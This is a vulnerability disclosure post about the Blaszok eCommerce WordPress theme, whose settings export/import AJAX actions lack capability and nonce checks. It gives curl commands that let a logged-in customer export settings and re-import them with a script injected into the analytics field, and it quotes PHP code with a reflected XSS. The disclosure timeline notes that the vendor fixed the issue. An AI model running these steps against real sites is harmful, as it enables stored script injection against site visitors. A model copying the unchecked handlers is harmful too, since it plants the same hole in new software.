Blaszok eCommerce WordPress theme suffers from a critical security issue: exposed theme options.

Exposed Options

This type of vulnerability means that an attacker can set, update and/or read the options stored for a theme or a plugin.

A lot of premium themes and plug-in developers try to implement their own system in which they store settings and options related to the product. There are quite a few ready-made solutions that can not only can cut back development time, but chances are that they are much more secure as well. One prime example would be the Redux framework.

Blaszok issues

I looked at the Blaszok eCommerce theme because it is listed under the eCommerce tag on ThemeForest.

I usually look at the low hanging fruits first wp_ajax, admin_init, unserialize, etc and this showed up (/themes/blaszok/panel/options-framework.php):

add_action('wp_ajax_mpcth_export_settings', 'mpcth_export_settings');  
[...]
add_action('wp_ajax_mpcth_import_settings', 'mpcth_import_settings');  

You can look a the full source code : options-framework.sphp

Both mpcth_export_settings and mpcth_import_settings do not check for capability or a nonce. This, under normal circumstances, would be an Authenticated stored XSS or exposed theme options, but because this theme is an eCommerce theme, chances are huge that WooCommerce is installed.

And if a theme has WooCommerce, chances are big that users can register under the customer role, and after they log in as a customer can call the mpcth_export_settings and the mpcth_export_settings endpoint.

Simple POC

Export the current settings

$ curl 'http://127.0.0.1/wp-admin/admin-ajax.php' -H 'Cookie: [CUSTOMER_AUTH_COOKIES] --data 'action=mpcth_export_settings' > settings.json

Edit the theme settings as needed :)

$ cat settings.json | python -m json.tool > settings_nice.json
$ vi settings_nice.json

I picked the first one mpcth_analytics_code seemed pretty straightforward.

"mpcth_analytics_code": " alert('Greetings from WpHutte'); ",
[...]
"mpcth_enable_analytics": "1",

Next step is to import it

$ curl 'http://127.0.0.1/wp-admin/admin-ajax.php' -H 'Cookie: [CUSTOMER_AUTH_COOKIES]' -F 'action=mpcth_import_settings' -F '[email protected]_nice.json'

<h3>Importing...</h3><h4>All settings were imported.</h4><script>location.href = ""</script>  

As a bonus, there is a reflected XSS as well:

echo '<h4>' . __('All settings were imported.', 'mpcth') . '</h4>';  
                    echo '<script>location.href = "' . $_REQUEST['panel_url'] . '"</script>';

Impact 4/10

The ability to edit the theme options is pretty scary, but the theme has only ~6000 sales.

Timeline

14 - 07 - 2017 - Vulnerability discovered  
15 - 07 - 2017 - Vendor notified  
26 - 07 - 2017 - Vendor fixed the issues in 3.9.4 (FIXED: Theme Options security vulnerability issue)  
14 - 08 - 2017 - Vulnerability goes public.